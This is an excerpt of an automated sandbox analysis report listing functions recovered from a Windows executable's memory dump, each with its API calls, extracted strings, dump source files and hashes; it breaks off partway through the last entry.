                                                                                  Function 00474C39 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: #cdata-section$#comment$#text$Event
                                                                                  • API String ID: 3519838083-3390456248
                                                                                  • Opcode ID: d74444ea6ae246a5fcd52deee4b3b08baadefe241ee4191b13a5b8079ca5d7f3
                                                                                  • Instruction ID: 60099b658d9859a82bfb69d1fdd759b0ca94e8513f43e305d0fe7e6d048a6727
                                                                                  • Opcode Fuzzy Hash: d74444ea6ae246a5fcd52deee4b3b08baadefe241ee4191b13a5b8079ca5d7f3
                                                                                  • Instruction Fuzzy Hash: 4551C271C006599ACF14EBA4C545AFEBBB8FF44304F00851FE556E3280DBB8AA45CB69
                                                                                  Function 00484010 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: __ftol
                                                                                  • String ID: invalid format$invalid option$obsolete option `*w' to `read'$too many arguments
                                                                                  • API String ID: 495808979-4157779061
                                                                                  • Opcode ID: 15b9554bd7a4ea5b2a5a601a280a116ebceade17c55b0f6e2630c6f085d4b515
                                                                                  • Instruction ID: e0c2392f2d2f685b4b337f94f51beba311b29aa7caf00e323d1eb288a706bb60
                                                                                  • Opcode Fuzzy Hash: 15b9554bd7a4ea5b2a5a601a280a116ebceade17c55b0f6e2630c6f085d4b515
                                                                                  • Instruction Fuzzy Hash: 5531246250412667D2017669BC469AF768CDEE33ADF140E2BF90491242FB0E5A5603FF
                                                                                  Function 004A0300 Relevance: 8.9, APIs: 7, Instructions: 120stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 367037083-0
                                                                                  • Opcode ID: c1b4aa99c591744d77e24262de923c41514dfdb4cba4f1819edd85ae8098d2cf
                                                                                  • Instruction ID: c2000fae65e973bf682877ba267cc6e0eafe41b7713f767df27ed37b344e3950
                                                                                  • Opcode Fuzzy Hash: c1b4aa99c591744d77e24262de923c41514dfdb4cba4f1819edd85ae8098d2cf
                                                                                  • Instruction Fuzzy Hash: F83195F24043459ED714DF64AC818AFB7E8ADE9304F44492EF99587201E635EA0DC7A7
                                                                                  Function 004789D6 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004789DB
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: DecrementH_prologInterlocked
                                                                                  • String ID: Name$SessionVar$Type$Value
                                                                                  • API String ID: 3164693477-3658809614
                                                                                  • Opcode ID: c30fba80bfb5f512735ab7995e7e5ebdfa5f859731753a1f4153265da0c30fc5
                                                                                  • Instruction ID: 559d49df9738f0f2aa537b90bad7d7da7e2bc04790b709e0d6a737118b72b1b9
                                                                                  • Opcode Fuzzy Hash: c30fba80bfb5f512735ab7995e7e5ebdfa5f859731753a1f4153265da0c30fc5
                                                                                  • Instruction Fuzzy Hash: C031A035600204AACB05FB66C45ABFE7B669F80358F04C46FF416A72C2CF7CAE46C659
                                                                                  Function 00431131 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00431136
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                  • __ftol.LIBCMT ref: 00431170
                                                                                  • __ftol.LIBCMT ref: 00431182
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiConfigureProductExA), ref: 004311D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol$AddressProclstrlen
                                                                                  • String ID: MsiConfigureProductExA
                                                                                  • API String ID: 1798312746-3229067908
                                                                                  • Opcode ID: e705f774f5854c683c13758d1592d92e6fa6bdfa5cdeb0886ab0068fade39687
                                                                                  • Instruction ID: df6110998287599cbeced67b680a2cc5b4270ad2a5a276f2d0b2e9a1094e35dc
                                                                                  • Opcode Fuzzy Hash: e705f774f5854c683c13758d1592d92e6fa6bdfa5cdeb0886ab0068fade39687
                                                                                  • Instruction Fuzzy Hash: 91213636A00654B9EB04B376DC06FDF261C9F55369F14441FF611A61C2EFBC9B81816D
                                                                                  Function 00424FA5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00424FCA
                                                                                    • Part of subcall function 00455BA2: IsWindow.USER32(00000000), ref: 00455BAF
                                                                                    • Part of subcall function 00455BA2: SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 00455BC8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prologMessageSendWindow__ftol
                                                                                  • String ID: Checked$Enabled$Text$Visible
                                                                                  • API String ID: 169280321-2599746497
                                                                                  • Opcode ID: c39997369cea762dc4f2e9f31624f0ebe06b2d32de481cf556f50b83e1459215
                                                                                  • Instruction ID: 8d6c665a7be74f9b94b49081d9114a1c7fcdb8133d187d135421d7f57c8dbec9
                                                                                  • Opcode Fuzzy Hash: c39997369cea762dc4f2e9f31624f0ebe06b2d32de481cf556f50b83e1459215
                                                                                  • Instruction Fuzzy Hash: 1921C07560692436DA1237A69C03EEF260D8F923A8F58050FF815651E3EF6D268343FE
                                                                                  Function 004D4A32 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 004D4A63
                                                                                    • Part of subcall function 004D4B4F: lstrlen.KERNEL32(00000104,00000000,?,004D4A93), ref: 004D4B86
                                                                                  • lstrcpy.KERNEL32(?,.HLP), ref: 004D4B04
                                                                                  • lstrcat.KERNEL32(?,.INI), ref: 004D4B31
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleNamelstrcatlstrcpylstrlen
                                                                                  • String ID: .HLP$.INI
                                                                                  • API String ID: 2421895198-3011182340
                                                                                  • Opcode ID: 2a8125e53c11a3b11c689ea8270c5afba2f51a438d7ab26526c8496349fead54
                                                                                  • Instruction ID: 6fc6edcaa4ee4fa5cc92a090c15fa21088debc593625c09b02b9fd64cf0048fe
                                                                                  • Opcode Fuzzy Hash: 2a8125e53c11a3b11c689ea8270c5afba2f51a438d7ab26526c8496349fead54
                                                                                  • Instruction Fuzzy Hash: 6A3196B55047189FDB20EB71CC84BC6B7FCAB08314F10496BE199D3252DB74AA848F58
                                                                                  Function 00438B28 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00438B2D
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                  • String ID: Drive$Extension$Filename$Folder
                                                                                  • API String ID: 2206737547-2892895018
                                                                                  • Opcode ID: d1446d1aa75ba1a8266e846b7f80a1937c37d196177ba52ef51e3ea5255a23eb
                                                                                  • Instruction ID: ff92154404ea6af389b92728fe176bb0ebe635ab6eeb443a2fc1549e66cd24c7
                                                                                  • Opcode Fuzzy Hash: d1446d1aa75ba1a8266e846b7f80a1937c37d196177ba52ef51e3ea5255a23eb
                                                                                  • Instruction Fuzzy Hash: 0D21B2B545252876DB02F7568C02FDE322C9F02358F04469BF925710D2EB6C67834BED
                                                                                  Function 00459060 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00459065
                                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 004590F9
                                                                                    • Part of subcall function 0045A438: GetParent.USER32(?), ref: 0045A43E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prologMessageParentSend
                                                                                  • String ID: Checked$false$true
                                                                                  • API String ID: 69551430-41118033
                                                                                  • Opcode ID: eeb462a1ae7cdd637d99e45a38a9bd7b8e5bbbf989467e15cf88058a7e05ba27
                                                                                  • Instruction ID: 5d2a5272f9817a8ccc15b888558cfbdbfc380bb0db16c797d7b57e977975eb12
                                                                                  • Opcode Fuzzy Hash: eeb462a1ae7cdd637d99e45a38a9bd7b8e5bbbf989467e15cf88058a7e05ba27
                                                                                  • Instruction Fuzzy Hash: 5821B634600712EFDB24EFA5D885BADB7A0BF04715F10852FE5169B2C2CBB89D48CB58
                                                                                  Function 004D0DF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 004D0E5C
                                                                                  • UpdateWindow.USER32(?), ref: 004D0E73
                                                                                  • GetParent.USER32(?), ref: 004D0EDE
                                                                                  • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 004D0EFA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$ParentPostSendUpdateWindow
                                                                                  • String ID: @
                                                                                  • API String ID: 4141989945-2766056989
                                                                                  • Opcode ID: c6446809ca85dec26698a406998a2aa3a5e938ad4870d76b726c28b66b862d28
                                                                                  • Instruction ID: 86e1e7d6e7110fd9237c50b3f35a9f87e7ea595d61b3f2a96bf147ff82183552
                                                                                  • Opcode Fuzzy Hash: c6446809ca85dec26698a406998a2aa3a5e938ad4870d76b726c28b66b862d28
                                                                                  • Instruction Fuzzy Hash: 3D319C31600B00AFDB304F21CC58B6A77A5BF54355F214D2FE54A5B3A2C7BAA8409B1C
                                                                                  Function 0045509F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004550A4
                                                                                    • Part of subcall function 0044EDBD: __EH_prolog.LIBCMT ref: 0044EDC2
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                  • String ID: Max$Min$Style$XPStyleBars
                                                                                  • API String ID: 2206737547-2789188563
                                                                                  • Opcode ID: 5cf71a5cbf0baad19b64f5371acc244c29bd7bee94a8e468d43c6e68cc60f067
                                                                                  • Instruction ID: f4742ba72ba14bfdb69cdfa3ca8a704830520304a578e322c6f3dbf961c088c6
                                                                                  • Opcode Fuzzy Hash: 5cf71a5cbf0baad19b64f5371acc244c29bd7bee94a8e468d43c6e68cc60f067
                                                                                  • Instruction Fuzzy Hash: DF21C535640209BBDF10AF929C42FDD3B2AFF40328F00C42EF5195A1C0D7B69A248B54
                                                                                  Function 00414A15 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00414A1A
                                                                                    • Part of subcall function 004B0B55: GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                    • Part of subcall function 004B0B55: GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                  • DeleteFileA.KERNEL32(?,?,00414941,?,?,000000FA,?,?,?,?), ref: 00414AB1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesDeleteErrorH_prologLast
                                                                                  • String ID: %s\%s.lnk$%s\%s.pif$%s\%s.url
                                                                                  • API String ID: 1057747857-1849461506
                                                                                  • Opcode ID: ea22b7530dbc3889c1a7079c18179179b410e677ec402c7a6711ce900b516dd8
                                                                                  • Instruction ID: d92c79b5f5e9cfdc62d802060550f424704f1858d4e759b7e3212320cb182e55
                                                                                  • Opcode Fuzzy Hash: ea22b7530dbc3889c1a7079c18179179b410e677ec402c7a6711ce900b516dd8
                                                                                  • Instruction Fuzzy Hash: BE21AE3190021EBADF00EBA1CD51EEFBB69FF10389F00806EF815A2191D7789A448B58
                                                                                  Function 0043106D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00431072
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                  • __ftol.LIBCMT ref: 004310AB
                                                                                  • __ftol.LIBCMT ref: 004310BD
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiConfigureProductA), ref: 004310D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol$AddressLibraryLoadProc
                                                                                  • String ID: MsiConfigureProductA
                                                                                  • API String ID: 36751254-1939934203
                                                                                  • Opcode ID: f5d2dec517d8fcf3ed16ce23875700f9c7cbaaadc8963f66ec064429c03deb44
                                                                                  • Instruction ID: b23ea9c30bd3914b6bafd7882e87eef79871eaad690b080c5886e6cb96b289e5
